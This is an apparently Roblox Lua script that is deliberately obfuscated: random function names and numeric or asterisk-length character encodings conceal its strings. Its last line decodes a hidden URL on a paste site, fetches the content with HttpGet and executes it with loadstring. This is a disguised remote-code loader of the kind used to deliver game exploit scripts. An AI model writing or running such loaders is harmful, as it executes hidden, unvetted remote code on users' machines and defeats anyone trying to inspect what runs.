function aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


local b=aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({'*****************************************************************','******************************************************************','*******************************************************************','********************************************************************','*********************************************************************','**********************************************************************','***********************************************************************','************************************************************************','*************************************************************************','**************************************************************************','***************************************************************************','****************************************************************************','*****************************************************************************','******************************************************************************','*******************************************************************************','********************************************************************************','*********************************************************************************','**********************************************************************************','***********************************************************************************','************************************************************************************','*************************************************************************************','**************************************************************************************','***************************************************************************************','****************************************************************************************','*****************************************************************************************','******************************************************************************************','*************************************************************************************************','**************************************************************************************************','***************************************************************************************************','****************************************************************************************************','*****************************************************************************************************','******************************************************************************************************','*******************************************************************************************************','********************************************************************************************************','*********************************************************************************************************','**********************************************************************************************************','***********************************************************************************************************','************************************************************************************************************','*************************************************************************************************************','**************************************************************************************************************','***************************************************************************************************************','****************************************************************************************************************','*****************************************************************************************************************','******************************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************************','**********************************************************************************************************************','***********************************************************************************************************************','************************************************************************************************************************','*************************************************************************************************************************','**************************************************************************************************************************','************************************************','*************************************************','**************************************************','***************************************************','****************************************************','*****************************************************','******************************************************','*******************************************************','********************************************************','*********************************************************','*******************************************','***********************************************'})
function JyDQWyIRrzWtdjUvfviRqgARKPvPpiBeRoLceykgGkBoWWjCzSGHGLHGpgRHYVfRcNlzKFcWBQpNmOHMOxQktsVeSKxMZkj(data) m=string.sub(data, 0, 55) data=data:gsub(m,aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({}))

data = string.gsub(data, aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({'*******************************************************************************************','**********************************************************************************************'})..b..aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({'*************************************************************','*********************************************************************************************'}), aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({})) return (data:gsub(aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({'**********************************************'}), function(x) if (x == aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({'*************************************************************'})) then return aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({}) end local r,f=aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({}),(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({'*************************************************'}) or aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({'************************************************'})) end return r; end):gsub(aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({'*************************************','****************************************************************************************************','*************************************','****************************************************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************'}), function(x) if (#x ~= 8) then return aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({}) end local c=0 for i=1,8 do c=c+(x:sub(i,i)==aHnItsggIJtERhezwBiORvgqXrMIthhWJcUSZwkNmyCPhipFqgUgyXuHvZwKKEiCVqlTGJrIsbMloprPalmRmunS({'*************************************************'}) and 2^(8-i) or 0) end return string.char(c) end)) end


 


function jbSyyFVVaftsFZiWoXiysTvShplDarKmXdIZCOZgqEeckbfMBSmXCEKohVsancTDHHAWMCKrPmiUYy(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


function ZOtGheBYifXUIhuBuIOrQKKSDqAnVBSdRFEkfzQiNvXcIbULvwuWTONkQbCLNKmeeLouSwzsSoMY(code)res=jbSyyFVVaftsFZiWoXiysTvShplDarKmXdIZCOZgqEeckbfMBSmXCEKohVsancTDHHAWMCKrPmiUYy({})for i in ipairs(code)do res=res..string.char(code[i]/105)end return res end 


function SnrfFQkAmGXoiYJLFQYUXlGrQLRCWxbUWfLGPylSZdEmIWLKZAUGEHltcZhldRoOAZInZTALbkkkTQZPBwez(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


function SILwLeOxzHkVMwBJqMEwtokwzbmEXUlvZLzMSeLLiwPDHeZ(code)res=SnrfFQkAmGXoiYJLFQYUXlGrQLRCWxbUWfLGPylSZdEmIWLKZAUGEHltcZhldRoOAZInZTALbkkkTQZPBwez({})for i in ipairs(code)do res=res..string.char(code[i]/105)end return res end 


loadstring(game:HttpGet(SILwLeOxzHkVMwBJqMEwtokwzbmEXUlvZLzMSeLLiwPDHeZ({10920,12180,12180,11760,12075,6090,4935,4935,11760,10185,12075,12180,10605,10710,12705,4830,10185,11760,11760,4935,8925,9135,11865,9345,6825,5775,5145,9240,4935,11970,10185,12495}), true))();                        
